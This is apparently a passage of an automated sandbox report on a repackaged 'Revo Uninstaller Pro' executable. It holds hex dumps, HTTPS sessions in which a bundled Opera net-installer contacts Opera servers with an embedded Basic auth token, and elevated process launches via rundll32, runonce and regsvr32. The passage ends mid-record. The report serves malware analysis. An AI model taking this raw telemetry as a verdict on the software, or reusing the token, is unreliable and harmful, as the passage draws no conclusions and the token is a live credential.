                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: 8d 4d f0 8b f0 8b fa e8 4c d7 ff ff 2b c6 8b cb 89 45 f0 8d 45 f0 1b d7 50 89 55 f4 e8 21 d7 ff ff 5f 5e 8b c3 5b c9 c2 04 00 55 8b ec 51 51 56 8b f1 8b ca e8 1f d7 ff ff 6a 00 68 40 42 0f 00 52 50 e8 91 87 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 ea d6 ff ff 8b c6 5e c9 c3 55 8b ec 51 51 56 8b f1 8b ca e8 ec d6 ff ff 6a 00 68 40 42 0f 00 52 50 e8 fe 89 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 b7 d6 ff ff 8b c6 5e c9 c3 81 f9 ff ff ff 7f 0f 87 e3 96 ff ff 8d 04 09 c3 3b 0d 40 b0 44 00 75 01 c3 e9 2e 02 00 00 e9 fe 03 00 00 6a 0c 68 b0 90 44 00 e8 99 08 00 00 c6 45 e7 00 8b 5d 0c 8b c3 8b 7d 10 0f af c7 8b 75 08 03 f0 89 75 08 83 65 fc 00 8b c7 4f 89 7d 10 85 c0 74 15 2b f3 89 75 08 8b 4d 14 ff 15 30 c2 43 00 8b ce ff 55 14 eb e1 b0 01 88 45 e7 c7
                                                                                                                                                                          Data Ascii: ML+EEPU!_^[UQQVjh@BRPEEUP^UQQVjh@BRPEEUP^;@Du.jhDE]}uueO}t+uM0CUE
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: ec 0f b6 42 ec 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 0e f6 ff ff 8b 46 ed 3b 42 ed 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ed 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e1 f5 ff ff 0f b6 4e ee 0f b6 42 ee 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 bf f5 ff ff 0f b6 4e ef 0f b6 42 ef 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9d f5 ff ff 0f b6 4e f0 0f b6 42 f0 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 7b f5 ff ff 8b 46 f1 3b 42 f1 0f 84 87 00 00 00 0f b6 c8 0f b6 42 f1 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 4e f5 ff ff 0f b6 4e f2 0f b6 42 f2 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 2c f5
                                                                                                                                                                          Data Ascii: B+t3EF;BB+t3ENB+t3ENB+t3ENB+t3E{F;BB+t3ENNB+t3E,


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.449849107.167.96.384438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:11 UTC183OUTPOST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1
                                                                                                                                                                          User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                                                          Host: autoupdate.geo.opera.com
                                                                                                                                                                          Content-Length: 656
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:11 UTC656OUTData Raw: 5a 54 45 7a 4d 7a 45 33 4d 32 55 34 4f 44 68 6b 4e 32 59 33 59 6d 45 30 4f 44 51 33 4e 6d 59 77 4e 6d 4e 6c 4e 6d 4a 6d 4d 44 45 34 4e 6d 59 34 4d 7a 41 7a 59 6d 4e 6d 4e 57 52 6d 4d 57 59 79 59 6d 56 6c 59 57 4a 6d 4e 44 45 78 5a 6a 45 31 5a 44 41 7a 4f 44 70 37 49 6d 4e 76 64 57 35 30 63 6e 6b 69 4f 69 4a 56 55 79 49 73 49 6d 6c 75 63 33 52 68 62 47 78 6c 63 6c 39 75 59 57 31 6c 49 6a 6f 69 54 33 42 6c 63 6d 46 54 5a 58 52 31 63 43 35 6c 65 47 55 69 4c 43 4a 77 63 6d 39 6b 64 57 4e 30 49 6a 70 37 49 6d 35 68 62 57 55 69 4f 69 4a 76 63 47 56 79 59 53 4a 39 4c 43 4a 78 64 57 56 79 65 53 49 36 49 69 39 76 63 47 56 79 59 53 39 7a 64 47 46 69 62 47 55 76 64 32 6c 75 5a 47 39 33 63 7a 39 31 64 47 31 66 63 32 39 31 63 6d 4e 6c 50 55 52 58 54 6b 78 54 56 43 5a
                                                                                                                                                                          Data Ascii: ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ
                                                                                                                                                                          2024-12-09 16:54:12 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:12 GMT
                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Allow: GET, HEAD, POST
                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Thu, 1 Jan 1970 00:00:01 GMT
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Referrer-Policy: same-origin
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                          2024-12-09 16:54:12 UTC942INData Raw: 33 61 32 0d 0a 7b 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 61 72 63 68 22 3a 20 22 78 36 34 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 63 68 65 63 6b 73 75 6d 22 3a 20 22 37 32 65 37 37 39 63 65 37 64 33 36 33 61 30 64 31 64 66 64 61 32 36 65 39 61 35 31 36 30 37 39 62 34 64 39 61 30 64 32 31 32 63 34 66 39 34 36 31 36 66 66 30 39 66 65 33 63 66 38 34 64 30 30 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 66 69 6c 65 6e 61 6d 65 22 3a 20 22 4f 70 65 72 61 5f 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 5f 41 75 74 6f 75 70 64 61 74 65 5f 78 36 34 2e 65 78 65 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 73 69 7a 65 22 3a 20 31 31 39 39 37 32 37 31 32 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 22 3a 20 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65 72
                                                                                                                                                                          Data Ascii: 3a2{ "installer_arch": "x64", "installer_checksum": "72e779ce7d363a0d1dfda26e9a516079b4d9a0d212c4f94616ff09fe3cf84d00", "installer_filename": "Opera_115.0.5322.77_Autoupdate_x64.exe", "installer_size": 119972712, "installer": "https://download.oper


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.449850107.167.96.394438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:11 UTC120OUTGET /me/ HTTP/1.1
                                                                                                                                                                          User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                                                          Host: autoupdate.opera.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:12 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:12 GMT
                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Allow: HEAD, GET
                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Thu, 1 Jan 1970 00:00:01 GMT
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Referrer-Policy: same-origin
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                          2024-12-09 16:54:12 UTC57INData Raw: 32 65 0d 0a 7b 0a 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 22 74 69 6d 65 73 74 61 6d 70 22 3a 20 31 37 33 33 37 36 33 32 35 32 0a 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 2e{ "country": "US", "timestamp": 1733763252}0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.449851107.167.125.1894438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:13 UTC222OUTPOST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 1474
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:13 UTC1474OUTData Raw: 00 00 00 05 6a 02 48 38 37 64 31 32 61 64 30 2d 31 63 31 34 2d 34 30 38 66 2d 38 31 35 31 2d 30 65 35 34 65 34 62 64 38 31 31 34 00 d8 db bd c5 f5 64 d8 db bd c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 02 00 00 00 00 02 02 08 6e 6f 6e 65 a0 0a 5a 54 45 7a 4d 7a 45 33 4d 32
                                                                                                                                                                          Data Ascii: jH87d12ad0-1c14-408f-8151-0e54e4bd8114ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71noneZTEzMzE3M2
                                                                                                                                                                          2024-12-09 16:54:13 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:13 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-09 16:54:13 UTC36INData Raw: 38 37 64 31 32 61 64 30 2d 31 63 31 34 2d 34 30 38 66 2d 38 31 35 31 2d 30 65 35 34 65 34 62 64 38 31 31 34
                                                                                                                                                                          Data Ascii: 87d12ad0-1c14-408f-8151-0e54e4bd8114


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.449857107.167.96.304438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:14 UTC249OUTGET /api/v2/features?country=US&language=en-GB&uuid=a6c287cc-47e5-4bf0-9dac-fbaf9040d09e&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1
                                                                                                                                                                          User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                                                          Host: features.opera-api2.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:14 UTC237INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:14 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 1768
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=3648
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                          2024-12-09 16:54:14 UTC1768INData Raw: 7b 22 66 65 61 74 75 72 65 73 22 3a 7b 22 30 31 39 37 39 32 39 39 63 38 63 64 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 33 62 38 33 35 37 65 35 61 30 38 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 36 66 62 62 64 30 62 37 62 66 37 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 66 39 63 66 38 37 35 38 62 63 63 22 3a 7b 22 73 74 61 74 65 22 3a 22 64 69 73 61 62 6c 65 64 22 7d 2c 22 31 63 34 64 64 64 62 36 35 62 61 63 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 31 64 32 34 64 63 65 62 39 33 37 61 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 32 31 31 34 64 63 38 62 64 37 32 61 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65
                                                                                                                                                                          Data Ascii: {"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enable


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.449858107.167.96.364438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:14 UTC262OUTGET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=cd9f81c6-729a-4d95-ac71-1ebba75bfc7b HTTP/1.1
                                                                                                                                                                          User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                                                          Host: download.opera.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:15 UTC346INHTTP/1.1 302 Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:15 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Location: https://download3.operacdn.com/ftp/pub/opera/desktop/115.0.5322.77/win/Opera_115.0.5322.77_Autoupdate_x64.exe
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                          2024-12-09 16:54:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          8192.168.2.449859107.167.125.1894438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:15 UTC221OUTPOST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 254
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:15 UTC254OUTData Raw: 00 00 00 05 6a 02 48 32 66 39 62 34 31 33 32 2d 61 36 35 36 2d 34 30 33 31 2d 39 61 65 33 2d 33 66 33 66 37 36 35 39 37 35 62 61 00 d8 db bd c5 f5 64 c8 8d be c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 0e 00 00 00 00 04 00 00 02 01 01 02 02 00 00 00 00 00 00 00 08 02 02
                                                                                                                                                                          Data Ascii: jH2f9b4132-a656-4031-9ae3-3f3f765975baddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71
                                                                                                                                                                          2024-12-09 16:54:15 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:15 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-09 16:54:15 UTC36INData Raw: 32 66 39 62 34 31 33 32 2d 61 36 35 36 2d 34 30 33 31 2d 39 61 65 33 2d 33 66 33 66 37 36 35 39 37 35 62 61
                                                                                                                                                                          Data Ascii: 2f9b4132-a656-4031-9ae3-3f3f765975ba


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          9192.168.2.449866107.167.125.1894438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:17 UTC221OUTPOST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 248
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:17 UTC248OUTData Raw: 00 00 00 05 6a 02 48 62 62 33 36 63 33 66 30 2d 34 38 66 64 2d 34 32 30 65 2d 38 37 34 30 2d 63 32 30 33 65 32 63 66 34 38 38 64 00 82 dc bd c5 f5 64 9e ad be c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 14 00 00 00 00 06 00 00 00 00 00 00 00 00 08 04 04
                                                                                                                                                                          Data Ascii: jHbb36c3f0-48fd-420e-8740-c203e2cf488dddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71
                                                                                                                                                                          2024-12-09 16:54:17 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:17 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-09 16:54:17 UTC36INData Raw: 62 62 33 36 63 33 66 30 2d 34 38 66 64 2d 34 32 30 65 2d 38 37 34 30 2d 63 32 30 33 65 32 63 66 34 38 38 64
                                                                                                                                                                          Data Ascii: bb36c3f0-48fd-420e-8740-c203e2cf488d


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          10192.168.2.449872107.167.125.1894438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:19 UTC221OUTPOST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 444
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:19 UTC444OUTData Raw: 00 00 00 05 6a 02 48 38 31 65 31 30 32 38 39 2d 33 37 33 61 2d 34 65 35 38 2d 38 65 66 66 2d 30 38 63 64 61 30 64 36 33 39 38 36 00 be 86 be c5 f5 64 8c cd be c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 16 02 dc 02 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65
                                                                                                                                                                          Data Ascii: jH81e10289-373a-4e58-8eff-08cda0d63986ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71https://download.ope
                                                                                                                                                                          2024-12-09 16:54:19 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:19 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-09 16:54:19 UTC36INData Raw: 38 31 65 31 30 32 38 39 2d 33 37 33 61 2d 34 65 35 38 2d 38 65 66 66 2d 30 38 63 64 61 30 64 36 33 39 38 36
                                                                                                                                                                          Data Ascii: 81e10289-373a-4e58-8eff-08cda0d63986


                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:11:52:30
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:22'221'229 bytes
                                                                                                                                                                          MD5 hash:881464F03502D44E29E5FEA8B4C35538
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:11:52:52
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
                                                                                                                                                                          Imagebase:0x7ff683040000
                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:11:52:54
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\runonce.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\system32\runonce.exe" -r
                                                                                                                                                                          Imagebase:0x7ff61c920000
                                                                                                                                                                          File size:61'952 bytes
                                                                                                                                                                          MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:11:52:55
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\grpconv.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\System32\grpconv.exe" -o
                                                                                                                                                                          Imagebase:0x7ff687230000
                                                                                                                                                                          File size:52'736 bytes
                                                                                                                                                                          MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:11:52:56
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
                                                                                                                                                                          Imagebase:0x7ff7a08e0000
                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                          MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:9
                                                                                                                                                                          Start time:11:52:57
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                          File size:25'576'112 bytes
                                                                                                                                                                          MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:10
                                                                                                                                                                          Start time:11:53:05
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                                                          Wow64 process (32bit):true
